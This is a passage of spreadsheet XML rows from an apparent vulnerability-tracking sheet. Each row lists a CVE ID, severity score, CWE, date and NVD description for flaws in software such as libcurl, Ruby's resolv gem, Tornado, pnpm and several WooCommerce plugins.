      <c r="K2840" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2840"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denial of service.</t>
        </is>
      </c>
      <c r="M2840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80123</t>
        </is>
      </c>
    </row>
    <row r="2841">
      <c r="A2841" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80135</t>
        </is>
      </c>
      <c r="C2841" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2841" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2841" s="5" t="inlineStr"/>
      <c r="F2841" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2841" s="5" t="inlineStr"/>
      <c r="H2841" s="5" t="inlineStr"/>
      <c r="I2841" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2841" s="5" t="inlineStr"/>
      <c r="K2841" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="L2841" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Check or Handling of Exceptional Conditions vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M2841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80135</t>
        </is>
      </c>
    </row>
    <row r="2842">
      <c r="A2842" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80212</t>
        </is>
      </c>
      <c r="C2842" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2842" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2842" s="5" t="inlineStr"/>
      <c r="F2842" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2842" s="5" t="inlineStr"/>
      <c r="H2842" s="5" t="inlineStr"/>
      <c r="I2842" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2842" s="5" t="inlineStr"/>
      <c r="K2842" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2842" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::Resource.get_class, Resolv::DNS::Resource::Generic.create, and Resolv::DNS::SvcParam::Generic.create generate a new class for each unknown DNS resource record (type, class) pair, or each unknown SvcParamKey, encountered while decoding a response. Each generated class was permanently registered both as a constant on Resource (or SvcParam::Generic) and as an entry in a class-lookup hash (ClassHash), and thus the class remained reachable through that constant after the response was discarded. Type and class are each 16-bit values, and thus an attacker controlling DNS responses (a spoofed response, or a malicious or hijacked upstream DNS server) has roughly 2^32 distinct (type, class) pairs to choose from. A single response of a few hundred kilobytes carrying tens of thousands of distinct unknown types permanently grows process memory by tens of megabytes; repeated responses accumulate without bound and are never reclaimed by garbage collection, because the constant keeps each class alive. Any code path that calls Resolv::DNS::Message.decode on attacker-influenced DNS responses is affected. resolv is a default gem, and thus this is reachable from a plain Ruby installation without any additional dependency.</t>
        </is>
      </c>
      <c r="M2842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80212</t>
        </is>
      </c>
    </row>
    <row r="2843">
      <c r="A2843" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80229</t>
        </is>
      </c>
      <c r="C2843" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2843" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2843" s="5" t="inlineStr"/>
      <c r="F2843" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2843" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2843" s="5" t="inlineStr"/>
      <c r="I2843" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2843" s="5" t="inlineStr"/>
      <c r="K2843" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2843" s="5" t="inlineStr">
        <is>
          <t>When performing transfers via libcurl’s multi interface, pooled TLS
connections can outlive their originating easy handles. In OpenSSL 3 provider
configurations, libcurl attaches an allocated library context to the easy
handle's state and passes it to OpenSSL without acquiring an ownership
reference; destroying the easy handle prematurely frees this context while the
active connection retains a dangling pointer, leading to a heap-use-after-free
upon subsequent I/O or post-handshake operations.</t>
        </is>
      </c>
      <c r="M2843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80229</t>
        </is>
      </c>
    </row>
    <row r="2844">
      <c r="A2844" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80230</t>
        </is>
      </c>
      <c r="C2844" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2844" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2844" s="5" t="inlineStr"/>
      <c r="F2844" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2844" s="5" t="inlineStr"/>
      <c r="H2844" s="5" t="inlineStr"/>
      <c r="I2844" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2844" s="5" t="inlineStr"/>
      <c r="K2844" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2844" s="5" t="inlineStr">
        <is>
          <t>When `CURLOPT_PINNEDPUBLICKEY` is configured alongside options that disable
standard peer verification (`CURLOPT_SSL_VERIFYPEER = 0` and
`CURLOPT_SSL_VERIFYHOST = 0`), libcurl fails to enforce public key pinning on
connections established without a presented server certificate. Bypassing the
pinning check under these disabled-verification conditions allows
unauthenticated connections to succeed when they should be rejected.</t>
        </is>
      </c>
      <c r="M2844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80230</t>
        </is>
      </c>
    </row>
    <row r="2845">
      <c r="A2845" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80231</t>
        </is>
      </c>
      <c r="C2845" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2845" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2845" s="5" t="inlineStr"/>
      <c r="F2845" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2845" s="5" t="inlineStr"/>
      <c r="H2845" s="5" t="inlineStr"/>
      <c r="I2845" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2845" s="5" t="inlineStr"/>
      <c r="K2845" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2845" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl makes it wrongly reuse an existing HTTPS connection setup
for a given hostname even when using a different Native CA Store setting
(`CURLSSLOPT_NATIVE_CA`) than when the connection was created.</t>
        </is>
      </c>
      <c r="M2845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80231</t>
        </is>
      </c>
    </row>
    <row r="2846">
      <c r="A2846" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80255</t>
        </is>
      </c>
      <c r="C2846" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2846" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2846" s="5" t="inlineStr"/>
      <c r="F2846" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2846" s="5" t="inlineStr"/>
      <c r="H2846" s="5" t="inlineStr"/>
      <c r="I2846" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2846" s="5" t="inlineStr"/>
      <c r="K2846" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L2846" s="5" t="inlineStr">
        <is>
          <t>A `Set-Cookie:` header using tab (horizontal tab, ASCII code 9) instead of
space (ascii code 32) immediately before the `Secure` attribute causes curl to
store the cookie without its Secure flag. The cookie might then wrongfully be
sent over plaintext HTTP on subsequent requests to the same host.</t>
        </is>
      </c>
      <c r="M2846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80255</t>
        </is>
      </c>
    </row>
    <row r="2847">
      <c r="A2847" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80924</t>
        </is>
      </c>
      <c r="C2847" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2847" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2847" s="5" t="inlineStr"/>
      <c r="F2847" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2847" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2847" s="5" t="inlineStr"/>
      <c r="I2847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2847" s="5" t="inlineStr"/>
      <c r="K2847" s="5" t="inlineStr"/>
      <c r="L2847" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: krb5 - use kfree_sensitive() for derived key buffers
crypto_krb5_prepare_encryption() and crypto_krb5_prepare_checksum()
free the buffer holding the freshly derived keys with plain kfree(),
leaving the key material behind in the freed slab object.</t>
        </is>
      </c>
      <c r="M2847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80924</t>
        </is>
      </c>
    </row>
    <row r="2848">
      <c r="A2848" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81265</t>
        </is>
      </c>
      <c r="C2848" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2848" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2848" s="5" t="inlineStr"/>
      <c r="F2848" s="5" t="inlineStr"/>
      <c r="G2848" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2848" s="5" t="inlineStr"/>
      <c r="I2848" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2848" s="5" t="inlineStr"/>
      <c r="K2848" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2848" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5.</t>
        </is>
      </c>
      <c r="M2848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81265</t>
        </is>
      </c>
    </row>
    <row r="2849">
      <c r="A2849" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81270</t>
        </is>
      </c>
      <c r="C2849" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2849" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2849" s="5" t="inlineStr"/>
      <c r="F2849" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2849" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2849" s="5" t="inlineStr"/>
      <c r="I2849" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2849" s="5" t="inlineStr"/>
      <c r="K2849" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2849" s="5" t="inlineStr">
        <is>
          <t>Apache Allura: exposure of non-public information via search.
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81270</t>
        </is>
      </c>
    </row>
    <row r="2850">
      <c r="A2850" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81355</t>
        </is>
      </c>
      <c r="C2850" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2850" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2850" s="5" t="inlineStr"/>
      <c r="F2850" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2850" s="5" t="inlineStr"/>
      <c r="H2850" s="5" t="inlineStr"/>
      <c r="I2850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2850" s="5" t="inlineStr"/>
      <c r="K2850" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2850" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t>
        </is>
      </c>
    </row>
    <row r="2851">
      <c r="A2851" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81624</t>
        </is>
      </c>
      <c r="C2851" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2851" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2851" s="5" t="inlineStr"/>
      <c r="F2851" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2851" s="5" t="inlineStr"/>
      <c r="H2851" s="5" t="inlineStr"/>
      <c r="I2851" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2851" s="5" t="inlineStr"/>
      <c r="K2851" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2851" s="5" t="inlineStr">
        <is>
          <t>Undertow is a flexible performant web server used in JBoss EAP and WildFly. A flaw was found in how Undertow handles WebSocket connections. Specifically, certain configuration limits like message buffer sizes and session timeouts cannot be adjusted and default to being unlimited. This allows a remote attacker to send large amounts of data or maintain connections indefinitely, potentially crashing the server by exhausting its memory or other resources.</t>
        </is>
      </c>
      <c r="M2851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81624</t>
        </is>
      </c>
    </row>
    <row r="2852">
      <c r="A2852" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81665</t>
        </is>
      </c>
      <c r="C2852" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2852" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2852" s="5" t="inlineStr"/>
      <c r="F2852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2852" s="5" t="inlineStr"/>
      <c r="H2852" s="5" t="inlineStr"/>
      <c r="I2852" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2852" s="5" t="inlineStr"/>
      <c r="K2852" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2852" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow was found in Corosync's Totem Process Group (totempg) message reassembly. When processing fragmented multicast messages, the buffer used to reassemble fragments lacks a runtime bounds check in release builds. A network-adjacent attacker able to send crafted multicast protocol messages to the cluster could cause a heap buffer overflow with attacker-controlled data. This can crash the Corosync daemon, causing a denial of service to the entire cluster, and may potentially allow further exploitation given sufficient heap-corruption control.</t>
        </is>
      </c>
      <c r="M2852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81665</t>
        </is>
      </c>
    </row>
    <row r="2853">
      <c r="A2853" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81786</t>
        </is>
      </c>
      <c r="C2853" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2853" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2853" s="5" t="inlineStr"/>
      <c r="F2853" s="5" t="inlineStr"/>
      <c r="G2853" s="5" t="inlineStr"/>
      <c r="H2853" s="5" t="inlineStr"/>
      <c r="I2853" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2853" s="5" t="inlineStr"/>
      <c r="K2853" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2853" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Thank You Page Customizer for WooCommerce &lt;= 1.2.2 versions.</t>
        </is>
      </c>
      <c r="M2853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81786</t>
        </is>
      </c>
    </row>
    <row r="2854">
      <c r="A2854" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81790</t>
        </is>
      </c>
      <c r="C2854" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2854" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2854" s="5" t="inlineStr"/>
      <c r="F2854" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2854" s="5" t="inlineStr"/>
      <c r="H2854" s="5" t="inlineStr"/>
      <c r="I2854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2854" s="5" t="inlineStr"/>
      <c r="K2854" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2854" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t>
        </is>
      </c>
      <c r="M2854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t>
        </is>
      </c>
    </row>
    <row r="2855">
      <c r="A2855" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81794</t>
        </is>
      </c>
      <c r="C2855" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2855" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2855" s="5" t="inlineStr"/>
      <c r="F2855" s="5" t="inlineStr"/>
      <c r="G2855" s="5" t="inlineStr"/>
      <c r="H2855" s="5" t="inlineStr"/>
      <c r="I2855" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2855" s="5" t="inlineStr"/>
      <c r="K2855" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2855" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Shirt Product Designer for WooCommerce 1.0.4 versions.</t>
        </is>
      </c>
      <c r="M2855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81794</t>
        </is>
      </c>
    </row>
    <row r="2856">
      <c r="A2856" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81799</t>
        </is>
      </c>
      <c r="C2856" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2856" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2856" s="5" t="inlineStr"/>
      <c r="F2856" s="5" t="inlineStr"/>
      <c r="G2856" s="5" t="inlineStr"/>
      <c r="H2856" s="5" t="inlineStr"/>
      <c r="I2856" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2856" s="5" t="inlineStr"/>
      <c r="K2856" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2856" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Return Refund and Exchange For WooCommerce &lt;= 4.6.4 versions.</t>
        </is>
      </c>
      <c r="M2856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81799</t>
        </is>
      </c>
    </row>
    <row r="2857">
      <c r="A2857" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81803</t>
        </is>
      </c>
      <c r="C2857" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2857" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2857" s="5" t="inlineStr"/>
      <c r="F2857" s="5" t="inlineStr"/>
      <c r="G2857" s="5" t="inlineStr"/>
      <c r="H2857" s="5" t="inlineStr"/>
      <c r="I2857" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2857" s="5" t="inlineStr"/>
      <c r="K2857" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2857" s="5" t="inlineStr">
        <is>
          <t>Subscriber Remote Code Execution (RCE) in RepairBuddy &lt;= 4.1224 versions.</t>
        </is>
      </c>
      <c r="M2857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81803</t>
        </is>
      </c>
    </row>
    <row r="2858">
      <c r="A2858" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81804</t>
        </is>
      </c>
      <c r="C2858" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2858" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2858" s="5" t="inlineStr"/>
      <c r="F2858" s="5" t="inlineStr"/>
      <c r="G2858" s="5" t="inlineStr"/>
      <c r="H2858" s="5" t="inlineStr"/>
      <c r="I2858" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2858" s="5" t="inlineStr"/>
      <c r="K2858" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L2858" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in ZHBackup – Backup, Restore &amp;amp; Migration &lt;= 2.4.2 versions.</t>
        </is>
      </c>
      <c r="M2858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81804</t>
        </is>
      </c>
    </row>
    <row r="2859">
      <c r="A2859" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82208</t>
        </is>
      </c>
      <c r="C2859" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2859" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2859" s="5" t="inlineStr"/>
      <c r="F2859" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2859" s="5" t="inlineStr"/>
      <c r="H2859" s="5" t="inlineStr"/>
      <c r="I2859" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2859" s="5" t="inlineStr"/>
      <c r="K2859" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2859" s="5" t="inlineStr">
        <is>
          <t>With the wolfSSL backend, when CA caching is enabled and an
`CURLOPT_SSL_CTX_FUNCTION` callback replaces the trust store, libcurl can
silently reinstall the cached store after the callback returns. A certificate
trusted by the cached store but rejected by the callback-selected store is
then incorrectly accepted.</t>
        </is>
      </c>
      <c r="M2859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82208</t>
        </is>
      </c>
    </row>
    <row r="2860">
      <c r="A2860" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82393</t>
        </is>
      </c>
      <c r="C2860" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2860" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2860" s="5" t="inlineStr"/>
      <c r="F2860" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2860" s="5" t="inlineStr"/>
      <c r="H2860" s="5" t="inlineStr"/>
      <c r="I2860" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2860" s="5" t="inlineStr"/>
      <c r="K2860" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73, CWE-94</t>
        </is>
      </c>
      <c r="L2860" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and 11.11.0, pnpm accepts a scoped path traversal in a tarball dependency's package.json manifest name because pnpm11/resolving/npm-resolver/src/pickPackage.ts rejects slash characters only for unscoped names. During pnpm install, the unvalidated name reaches raw path joins in pnpm11/installing/deps-resolver/src/resolvePeers.ts, pnpm11/installing/deps-resolver/src/index.ts, and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts, causing package extraction outside node_modules and allowing attacker-controlled files to overwrite arbitrary filesystem paths even when --ignore-scripts is used. The overwrite can replace shell startup files, Git hooks, or installed package code and lead to code execution. This issue is fixed in versions 10.34.5, and 11.11.0.</t>
        </is>
      </c>
      <c r="M2860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82393</t>
        </is>
      </c>
    </row>
    <row r="2861">
      <c r="A2861" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82397</t>
        </is>
      </c>
      <c r="C2861" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2861" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2861" s="5" t="inlineStr"/>
      <c r="F2861" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2861" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2861" s="5" t="inlineStr"/>
      <c r="I2861" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2861" s="5" t="inlineStr"/>
      <c r="K2861" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400</t>
        </is>
      </c>
      <c r="L2861" s="5" t="inlineStr">
        <is>
          <t>Tornado is a Python web framework and asynchronous networking library. Prior to 6.5.8, Tornado parses application/x-www-form-urlencoded request bodies with urllib.parse.parse_qs in tornado/escape.py without passing max_num_fields. RequestHandler._execute in tornado/web.py parses the body before handler dispatch through HTTPServerRequest._parse_body and parse_body_arguments in tornado/httputil.py, so an unauthenticated request body containing millions of separator-delimited fields can synchronously stall the single-threaded event loop and delay every connection. The body is bounded only by max_buffer_size, which defaults to 104857600 bytes. This issue is fixed in version 6.5.8.</t>
        </is>
      </c>
      <c r="M2861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82397</t>
        </is>
      </c>
    </row>
    <row r="2862">
      <c r="A2862" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83989</t>
        </is>
      </c>
      <c r="C2862" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2862" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2862" s="5" t="inlineStr"/>
      <c r="F2862" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2862" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H286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862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2862" s="5" t="inlineStr"/>
      <c r="K2862" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2862" s="5" t="inlineStr">
        <is>
